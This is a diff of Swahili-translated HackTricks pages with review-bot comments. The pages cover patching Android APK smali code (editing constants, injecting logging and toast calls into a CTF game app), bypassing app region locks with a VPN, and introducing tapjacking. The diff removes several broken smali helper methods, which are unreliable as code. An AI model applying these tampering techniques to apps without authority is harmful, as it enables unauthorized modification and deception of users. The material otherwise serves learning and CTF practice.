Seti ya maagizo ya Smali inapatikana [hapa](https://source.android.com/devices/tech/dalvik/dalvik-bytecode#instructions).
The Smali instruction set is available [here](https://source.android.com/devices/tech/dalvik/dalvik-bytecode#instructions).
### Mabadiliko Mepesi
### Mabadiliko ya Mwanga
### Badilisha thamani za awali za kivinjari ndani ya kazi
### Badilisha thamani za awali za kigezo ndani ya kazi
Baadhi ya kivinjari hutajwa mwanzoni mwa kazi kwa kutumia opcode _const_, unaweza kubadilisha thamani zake, au unaweza kutaja mpya:
Baadhi ya vigezo vinafafanuliwa mwanzoni mwa kazi kwa kutumia opcode _const_, unaweza kubadilisha thamani zake, au unaweza kufafanua mpya:
```bash
#Number
const v9, 0xf4240
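Review bot: the heading `### Mabadiliko ya Mwanga` renders "Light Changes" literally as "changes of light"; the intended sense is small or minor changes (`Mabadiliko Madogo`), which the old line `### Mabadiliko Mepesi` already conveyed. Also, the `const v9, 0xf4240` / `const-string v5, "wins"` block is fenced as `bash` although its contents are Smali instructions.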
@ -116,466 +117,6 @@ const/4 v8, 0x1
const-string v5, "wins"
```
### Operesheni za Msingi
#### Kusoma na Kuandika Faili
Kusoma faili:
```smali
.method public static readTextFile(Ljava/lang/String;)Ljava/lang/String;
.locals 3
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
new-instance v1, Ljava/io/BufferedReader;
new-instance v2, Ljava/io/FileReader;
invoke-direct {v2, v0}, Ljava/io/FileReader;-><init>(Ljava/io/File;)V
invoke-direct {v1, v2}, Ljava/io/BufferedReader;-><init>(Ljava/io/Reader;)V
.line 3
const/4 v2, 0x0
:cond_0
:goto_0
invoke-virtual {v1}, Ljava/io/BufferedReader;->readLine()Ljava/lang/String;
move-result-object v0
if-eqz v0, :cond_1
.line 4
new-instance v2, Ljava/lang/StringBuilder;
invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
.line 5
invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
.line 3
goto :goto_0
.line 7
:cond_1
invoke-virtual {v1}, Ljava/io/BufferedReader;->close()V
.line 8
invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
move-result-object v0
.line 9
return-object v0
.end method
```
Kuandika faili:
```smali
.method public static writeTextFile(Ljava/lang/String;Ljava/lang/String;)V
.locals 3
.param p0, "filePath" # Ljava/lang/String;
.param p1, "content" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
new-instance v1, Ljava/io/BufferedWriter;
new-instance v2, Ljava/io/FileWriter;
invoke-direct {v2, v0}, Ljava/io/FileWriter;-><init>(Ljava/io/File;)V
invoke-direct {v1, v2}, Ljava/io/BufferedWriter;-><init>(Ljava/io/Writer;)V
.line 3
invoke-virtual {v1, p1}, Ljava/io/BufferedWriter;->write(Ljava/lang/String;)V
.line 4
invoke-virtual {v1}, Ljava/io/BufferedWriter;->close()V
.line 5
return-void
.end method
```
#### Kufuta Faili
```smali
.method public static deleteFile(Ljava/lang/String;)Z
.locals 2
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
invoke-virtual {v0}, Ljava/io/File;->delete()Z
move-result v1
.line 3
return v1
.end method
```
#### Kupata Ukubwa wa Faili
```smali
.method public static getFileSize(Ljava/lang/String;)J
.locals 3
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
invoke-virtual {v0}, Ljava/io/File;->length()J
move-result-wide v1
.line 3
return-wide v1
.end method
```
#### Kupata Tarehe ya Mwisho ya Kubadilishwa kwa Faili
```smali
.method public static getLastModified(Ljava/lang/String;)J
.locals 3
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
invoke-virtual {v0}, Ljava/io/File;->lastModified()J
move-result-wide v1
.line 3
return-wide v1
.end method
```
#### Kupata Orodha ya Faili na Vichwa vya Habari
```smali
.method public static getFiles(Ljava/lang/String;)[Ljava/lang/String;
.locals 4
.param p0, "dirPath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
invoke-virtual {v0}, Ljava/io/File;->listFiles()[Ljava/io/File;
move-result-object v1
.line 3
array-length v2, v1
new-array v3, v2, [Ljava/lang/String;
.line 4
const/4 v2, 0x0
:goto_0
if-ge v2, v3, :cond_0
aget-object v0, v1, v2
invoke-virtual {v0}, Ljava/io/File;->getName()Ljava/lang/String;
move-result-object v0
aput-object v0, v3, v2
.line 3
add-int/lit8 v2, v2, 0x1
goto :goto_0
.line 6
:cond_0
return-object v3
.end method
```
#### Kupata Orodha ya Vichwa vya Habari vya Faili
```smali
.method public static getHeaders(Ljava/lang/String;)[Ljava/lang/String;
.locals 4
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
new-instance v1, Ljava/io/BufferedReader;
new-instance v2, Ljava/io/FileReader;
invoke-direct {v2, v0}, Ljava/io/FileReader;-><init>(Ljava/io/File;)V
invoke-direct {v1, v2}, Ljava/io/BufferedReader;-><init>(Ljava/io/Reader;)V
.line 3
new-instance v2, Ljava/util/ArrayList;
invoke-direct {v2}, Ljava/util/ArrayList;-><init>()V
.line 4
:cond_0
:goto_0
invoke-virtual {v1}, Ljava/io/BufferedReader;->readLine()Ljava/lang/String;
move-result-object v0
if-eqz v0, :cond_1
.line 5
invoke-virtual {v2, v0}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
goto :goto_0
.line 7
:cond_1
invoke-virtual {v1}, Ljava/io/BufferedReader;->close()V
.line 8
invoke-virtual {v2}, Ljava/util/ArrayList;->toArray()[Ljava/lang/Object;
move-result-object v0
check-cast v0, [Ljava/lang/String;
.line 9
return-object v0
.end method
```
#### Kupata Aina ya Faili
```smali
.method public static getFileType(Ljava/lang/String;)Ljava/lang/String;
.locals 2
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
invoke-virtual {v0}, Ljava/io/File;->getName()Ljava/lang/String;
move-result-object v0
.line 3
const/4 v1, 0x2e
invoke-virtual {v0, v1}, Ljava/lang/String;->lastIndexOf(I)I
move-result v1
.line 4
if-lez v1, :cond_0
.line 5
invoke-virtual {v0, v1}, Ljava/lang/String;->substring(I)Ljava/lang/String;
move-result-object v0
.line 6
return-object v0
.line 8
:cond_0
const-string v0, ""
goto :goto_0
.end method
```
#### Kupata Uendeshaji wa Faili
```smali
.method public static getFilePermissions(Ljava/lang/String;)Ljava/lang/String;
.locals 3
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
invoke-virtual {v0}, Ljava/io/File;->canRead()Z
move-result v1
.line 3
invoke-virtual {v0}, Ljava/io/File;->canWrite()Z
move-result v2
.line 4
new-instance v0, Ljava/lang/StringBuilder;
invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
.line 5
const-string v3, "Read: "
invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
.line 6
invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
.line 7
const-string v1, ", Write: "
invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
.line 8
invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
.line 9
invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
move-result-object v0
.line 10
return-object v0
.end method
```
#### Kupata Muda wa Kuundwa kwa Faili
```smali
.method public static getCreationTime(Ljava/lang/String;)J
.locals 3
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/io/File;
invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
.line 2
invoke-virtual {v0}, Ljava/io/File;->lastModified()J
move-result-wide v1
.line 3
return-wide v1
.end method
```
#### Kupata Orodha ya Vichwa vya Habari vya Faili ya ZIP
```smali
.method public static getZipFileHeaders(Ljava/lang/String;)[Ljava/lang/String;
.locals 4
.param p0, "filePath" # Ljava/lang/String;
.prologue
.line 1
new-instance v0, Ljava/util/zip/ZipFile;
invoke-direct {v0, p0}, Ljava/util/zip/ZipFile;-><init>(Ljava/lang/String;)V
.line 2
invoke-virtual {v0}, Ljava/util/zip/ZipFile;->entries()Ljava/util/Enumeration;
move-result-object v1
.line 3
new-instance v2, Ljava/util/ArrayList;
invoke-direct {v2}, Ljava/util/ArrayList;-><init>()V
.line 4
:cond_0
:goto_0
invoke-interface {v1}, Ljava/util/Enumeration;->hasMoreElements()Z
move-result v3
if-eqz v3, :cond_1
.line 5
invoke-interface {v1}, Ljava/util/Enumeration;->nextElement()Ljava/lang/Object;
move-result-object v0
check-cast v0, Ljava/util/zip/ZipEntry;
.line 6
invoke-virtual {v0}, Ljava/util/zip/ZipEntry;->getName()Ljava/lang/String;
move-result-object v0
.line 7
invoke-virtual {v2, v0}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
goto :goto_0
.line 9
:cond_1
invoke-virtual {v2}, Ljava/util/ArrayList;->toArray()[Ljava/lang/Object;
move-result-object v0
check-cast v0, [Ljava/lang/String;
.line 10
return-object v0
.end method
```
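Review bot: the deleted smali helpers from `deleteFile` down to `getZipFileHeaders` should stay deleted, because several of them would not pass the dex verifier, let alone do what their headings claim: `getFilePermissions` declares `.locals 3` but writes register `v3` (`const-string v3, "Read: "`), `getFileType` ends in `goto :goto_0` without defining any `:goto_0` label, `getFiles` overwrites the array length in `v2` with `const/4 v2, 0x0` and then compares the counter against the array reference (`if-ge v2, v3, :cond_0`), and `getCreationTime` just returns `lastModified()J`. `getHeaders` and `getZipFileHeaders` also `check-cast` the `Object[]` returned by `ArrayList;->toArray()` to `[Ljava/lang/String;`, which fails with a `ClassCastException` at runtime. Nothing in the retained text references these methods, so no replacement is needed.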
```bash
#Math
add-int/lit8 v0, v2, 0x1 #v2 + 0x1 and save it in v0
@ -600,7 +141,7 @@ goto :goto_6 #Always go to: :goto_6
```
### Mabadiliko Makubwa
### Kurekodi (Logging)
### Kurekodi
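Review bot: the heading rename from `### Kurekodi (Logging)` to `### Kurekodi` drops the English term that names the Android `Log` API called in the block right below (`Landroid/util/Log;->d`); keep the parenthetical so a reader searching the page for "Logging" still lands on this section. Either way, the three `###` headings should be separated by blank lines rather than stacked, which is how the rest of the file formats them.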
```bash
#Log win: <number>
iget v5, p0, Lcom/google/ctf/shallweplayagame/GameActivity;->o:I #Get this.o inside v5
@ -609,19 +150,19 @@ move-result-object v1 #Move to v1
const-string v5, "wins" #Save "win" inside v5
invoke-static {v5, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I #Logging "Wins: <num>"
```
Mapendekezo:
Recommendations:
* Ikiwa utatumia pembejeo zilizotangazwa ndani ya kazi (zilizotangazwa v0, v1, v2...), weka mistari hii kati ya _.local \<number>_ na tangazo la pembejeo (_const v0, 0x1_)
* Ikiwa unataka kuweka kificho cha kuingiza katikati ya kificho cha kazi:
* Ongeza 2 kwenye idadi ya pembejeo zilizotangazwa: Mfano: kutoka _.locals 10_ hadi _.locals 12_
* Pembejeo mpya inapaswa kuwa nambari inayofuata ya pembejeo zilizotangazwa tayari (katika mfano huu itakuwa _v10_ na _v11_, kumbuka kuwa inaanza na v0).
* Badilisha kificho cha kazi ya kuingiza na tumia _v10_ na _v11_ badala ya _v5_ na _v1_.
* Ikiwa unatumia mabadiliko yaliyotangazwa ndani ya kazi (iliyotangazwa v0,v1,v2...) weka mistari hii kati ya _.local \<number>_ na matangazo ya mabadiliko (_const v0, 0x1_)
* Ikiwa unataka kuweka msimbo wa logging katikati ya msimbo wa kazi:
* Ongeza 2 kwa idadi ya mabadiliko yaliyotangazwa: Mfano: kutoka _.locals 10_ hadi _.locals 12_
* Mabadiliko mapya yanapaswa kuwa nambari zinazofuata za mabadiliko yaliyotangazwa tayari (katika mfano huu yanapaswa kuwa _v10_ na _v11_, kumbuka kwamba inaanza katika v0).
* Badilisha msimbo wa kazi ya logging na utumie _v10_ na _v11_ badala ya _v5_ na _v1_.
### Kutoa taarifa
### Toasting
Kumbuka kuongeza 3 kwenye idadi ya _.locals_ mwanzoni mwa kazi.
Kumbuka kuongeza 3 kwa idadi ya _.locals_ mwanzoni mwa kazi.
Kificho hiki kimeandaliwa ili kiingizwe katika **katikati ya kazi** (**badilisha** idadi ya **pembejeo** kama inavyohitajika). Itachukua **thamani ya this.o**, **itabadilisha** kuwa **String** na kisha **kutoa taarifa** na thamani yake.
Msimbo huu umeandaliwa kuingizwa katika **katikati ya kazi** (**badilisha** nambari ya **mabadiliko** kama inavyohitajika). Itachukua **thamani ya this.o**, **kubadilisha** kuwa **String** na kisha **kutengeneza** **toast** na thamani yake.
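Review bot: the first bullet under `Recommendations:` still writes the directive as `_.local \<number>_` while the bullet two lines later writes `_.locals 10_`; the smali directive is `.locals`, so the first bullet should use it too (the removed line carried the same typo, so this was the moment to fix it). Also, `Mapendekezo:` and `### Kutoa taarifa` were Swahili in the removed lines but the replacement lines keep `Recommendations:` and `### Toasting` in English, which clashes with the surrounding Swahili headings such as `### Kurekodi`. The register-count advice itself does match the code: the logging block uses `v5` and `v1` (two registers, hence "add 2"), and the toast block uses `v10`, `v11` and `v12` (three, hence "add 3").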
```bash
const/4 v10, 0x1
const/4 v11, 0x1
@ -633,16 +174,17 @@ invoke-static {p0, v11, v12}, Landroid/widget/Toast;->makeText(Landroid/content/
move-result-object v12
invoke-virtual {v12}, Landroid/widget/Toast;->show()V
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
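Review bot: the replacement footer translates the training banner (`Jifunze na fanya mazoezi ya AWS Hacking`), while the banner at the top of the next file in this same commit keeps the English `Learn & practice AWS Hacking`; pick one form for the shared boilerplate so a later automated banner update matches every file. The removed bullets (PEASS swag, NFTs, the `@carlospolopm` label) are correctly replaced by the subscription-plan bullet and the `@hacktricks_live` handle, which finally agrees with the `https://twitter.com/hacktricks_live` link target the old line already used.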

@ -1,57 +1,59 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Katika hali ambapo programu inazuiliwa kwa nchi fulani, na huwezi kuweka kwenye kifaa chako cha Android kutokana na vizuizi vya kikanda, kudanganya eneo lako kwenda nchi ambapo programu inapatikana kunaweza kukupa ufikiaji. Hatua zifuatazo zinaelezea jinsi ya kufanya hivyo:
Katika hali ambapo programu imewekwa vizuizi kwa nchi fulani, na huwezi kuisakinisha kwenye kifaa chako cha Android kutokana na vizuizi vya kikanda, kubadilisha eneo lako kuwa nchi ambapo programu hiyo inapatikana kunaweza kukupa ufikiaji. Hatua zilizo hapa chini zinaelezea jinsi ya kufanya hivyo:
1. **Sakinisha Hotspot Shield Free VPN Proxy:**
- Anza kwa kupakua na kusakinisha Hotspot Shield Free VPN Proxy kutoka Duka la Google Play.
- Anza kwa kupakua na kusakinisha Hotspot Shield Free VPN Proxy kutoka Google Play Store.
2. **unganisha kwenye Seva ya VPN:**
2. **Unganisha kwenye Server ya VPN:**
- Fungua programu ya Hotspot Shield.
- Unganisha kwenye seva ya VPN kwa kuchagua nchi ambapo programu unayotaka kufikia inapatikana.
- Unganisha kwenye server ya VPN kwa kuchagua nchi ambapo programu unayotaka kufikia inapatikana.
3. **Futa Data ya Duka la Google Play:**
3. **Futa Data za Google Play Store:**
- Nenda kwenye **Mipangilio** ya kifaa chako.
- Endelea kwenye **Programu** au **Meneja wa Programu** (hii inaweza kutofautiana kulingana na kifaa chako).
- Tafuta na chagua **Duka la Google Play** kutoka kwenye orodha ya programu.
- Bonyeza **Lazimisha Kusitisha** kumaliza mchakato wowote unaofanya kazi wa programu.
- Kisha bonyeza **Futa Data** au **Futa Uhifadhi** (maneno sahihi yanaweza kutofautiana) ili kurejesha programu ya Duka la Google Play kwenye hali yake ya awali.
- Tafuta na uchague **Google Play Store** kutoka kwenye orodha ya programu.
- Gusa **Lazimisha Kusitisha** ili kumaliza mchakato wowote unaoendelea wa programu hiyo.
- Kisha gusa **Futa Data** au **Futa Hifadhi** (maneno halisi yanaweza kutofautiana) ili kurejesha programu ya Google Play Store kwenye hali yake ya awali.
4. **Fikia Programu Iliyozuiwa:**
- Fungua **Duka la Google Play**.
- Sasa duka litakuonyesha yaliyomo ya nchi uliyounganishwa nayo kupitia VPN.
- Unapaswa kuweza kutafuta na kuweka programu ambayo awali haikuwa inapatikana katika eneo lako halisi.
4. **Fikia Programu Iliyowekwa Vizuizi:**
- Fungua **Google Play Store**.
- Duka sasa linapaswa kuonyesha maudhui ya nchi uliyounganishwa nayo kupitia VPN.
- Unapaswa kuwa na uwezo wa kutafuta na kusakinisha programu ambayo hapo awali haikupatikana katika eneo lako halisi.
### Vidokezo muhimu:
- Ufanisi wa njia hii unaweza kutofautiana kulingana na mambo kadhaa ikiwa ni pamoja na uaminifu wa huduma ya VPN na vizuizi maalum vya kikanda vilivyowekwa na programu.
- Matumizi ya kawaida ya VPN yanaweza kuathiri utendaji wa baadhi ya programu na huduma.
- Jua sheria za matumizi ya programu au huduma yoyote unayotumia, kwani matumizi ya VPN kwa kudukua vizuizi vya kikanda kunaweza kukiuka sheria hizo.
### Maelezo Muhimu:
- Ufanisi wa njia hii unaweza kutofautiana kulingana na mambo kadhaa ikiwa ni pamoja na uaminifu wa huduma ya VPN na vizuizi vya kikanda vilivyowekwa na programu.
- Kutumia VPN mara kwa mara kunaweza kuathiri utendaji wa programu na huduma zingine.
- Kuwa makini na masharti ya huduma ya programu au huduma yoyote unayotumia, kwani kutumia VPN kupita vizuizi vya kikanda kunaweza kukiuka masharti hayo.
## Marejeo
* [https://manifestsecurity.com/android-application-security-part-23/](https://manifestsecurity.com/android-application-security-part-23/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
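Review bot: the replacement banner bullets at both the top and the bottom of this file (`Check the subscription plans`, `Join the Discord group`, `Share hacking tricks`) are left in English, while the body text is Swahili and the previous file in this commit translated the same bullets (`Angalia mpango wa usajili`, `Jiunge na kikundi cha Discord`); use one form across the commit. In the step list, `Seva ya VPN` in the removed lines becomes `Server ya VPN` in the new ones; `seva` is the established Swahili loanword, and the rest of the rewrite (`Duka la Google Play` becoming `Google Play Store`) shows the convention is now "product names untranslated, common nouns translated", so `seva` is the consistent choice.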

@ -1,47 +1,48 @@
# Tapjacking
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## **Maelezo Msingi**
## **Basic Information**
**Tapjacking** ni shambulio ambapo **programu mbaya** inazinduliwa na **kujipanga juu ya programu ya mwathiriwa**. Mara tu inapofunika programu ya mwathiriwa, kiolesura chake cha mtumiaji kimeundwa kwa njia ambayo inadanganya mtumiaji kuingiliana nacho, wakati inapitisha uingiliano kwa programu ya mwathiriwa.\
Kimsingi, inamfanya mtumiaji **ashindwe kujua kwamba wanafanya vitendo kwenye programu ya mwathiriwa**.
**Tapjacking** ni shambulio ambapo **programu** **mbaya** inazinduliwa na **kujiweka juu ya programu ya mwathirika**. Mara inapoifunika kwa wazi programu ya mwathirika, kiolesura chake cha mtumiaji kimeundwa kwa njia ya kudanganya mtumiaji kuingiliana nayo, wakati inapitisha mwingiliano huo kwa programu ya mwathirika.\
Kwa hivyo, inafanya **mtumiaji kuwa kipofu kwa kujua kwamba kwa kweli wanatekeleza vitendo kwenye programu ya mwathirika**.
### Uchunguzi
### Detection
Ili kugundua programu zinazoweza kushambuliwa na hili, unapaswa kutafuta **shughuli zilizotolewa** kwenye mwongozo wa android (kumbuka kwamba shughuli na intent-filter zinazotolewa kwa chaguo-msingi). Mara baada ya kupata shughuli zilizotolewa, **angalia kama zinahitaji idhini yoyote**. Hii ni kwa sababu **programu mbaya itahitaji idhini hiyo pia**.
